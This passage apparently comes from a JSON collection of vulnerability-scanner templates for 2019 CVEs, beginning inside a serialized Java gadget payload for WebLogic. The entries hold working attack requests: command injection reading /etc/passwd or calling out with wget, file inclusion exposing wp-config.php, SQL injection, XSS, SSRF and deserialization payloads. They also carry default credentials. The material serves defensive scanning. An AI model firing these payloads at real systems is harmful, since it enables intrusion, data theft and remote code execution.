index=\"3004\"><byte>1</byte></void><void index=\"3005\"><byte>0</byte></void><void index=\"3006\"><byte>1</byte></void><void index=\"3007\"><byte>0</byte></void><void index=\"3008\"><byte>0</byte></void><void index=\"3009\"><byte>0</byte></void><void index=\"3010\"><byte>5</byte></void><void index=\"3011\"><byte>42</byte></void><void index=\"3012\"><byte>-73</byte></void><void index=\"3013\"><byte>0</byte></void><void index=\"3014\"><byte>1</byte></void><void index=\"3015\"><byte>-79</byte></void><void index=\"3016\"><byte>0</byte></void><void index=\"3017\"><byte>0</byte></void><void index=\"3018\"><byte>0</byte></void><void index=\"3019\"><byte>2</byte></void><void index=\"3020\"><byte>0</byte></void><void index=\"3021\"><byte>13</byte></void><void index=\"3022\"><byte>0</byte></void><void index=\"3023\"><byte>0</byte></void><void index=\"3024\"><byte>0</byte></void><void index=\"3025\"><byte>6</byte></void><void index=\"3026\"><byte>0</byte></void><void index=\"3027\"><byte>1</byte></void><void index=\"3028\"><byte>0</byte></void><void index=\"3029\"><byte>0</byte></void><void index=\"3030\"><byte>0</byte></void><void index=\"3031\"><byte>54</byte></void><void index=\"3032\"><byte>0</byte></void><void index=\"3033\"><byte>14</byte></void><void index=\"3034\"><byte>0</byte></void><void index=\"3035\"><byte>0</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>12</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>1</byte></void><void index=\"3040\"><byte>0</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>0</byte></void><void index=\"3043\"><byte>5</byte></void><void index=\"3044\"><byte>0</byte></void><void index=\"3045\"><byte>15</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>18</byte></void><void index=\"3048\"><byte>0</byte></void><void index=\"3049\"><byte>0</byte></void><void index=\"3050\"><byte>0</byte></void><void index=\"3051\"><byte>2</byte></void><void index=\"3052\"><byte>0</byte></void><void index=\"3053\"><byte>19</byte></void><void index=\"3054\"><byte>0</byte></void><void index=\"3055\"><byte>0</byte></void><void index=\"3056\"><byte>0</byte></void><void index=\"3057\"><byte>2</byte></void><void index=\"3058\"><byte>0</byte></void><void index=\"3059\"><byte>20</byte></void><void index=\"3060\"><byte>0</byte></void><void index=\"3061\"><byte>17</byte></void><void index=\"3062\"><byte>0</byte></void><void index=\"3063\"><byte>0</byte></void><void index=\"3064\"><byte>0</byte></void><void index=\"3065\"><byte>10</byte></void><void index=\"3066\"><byte>0</byte></void><void index=\"3067\"><byte>1</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>2</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>22</byte></void><void index=\"3072\"><byte>0</byte></void><void index=\"3073\"><byte>16</byte></void><void index=\"3074\"><byte>0</byte></void><void index=\"3075\"><byte>9</byte></void><void index=\"3076\"><byte>112</byte></void><void index=\"3077\"><byte>116</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>4</byte></void><void index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"threads":50,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%2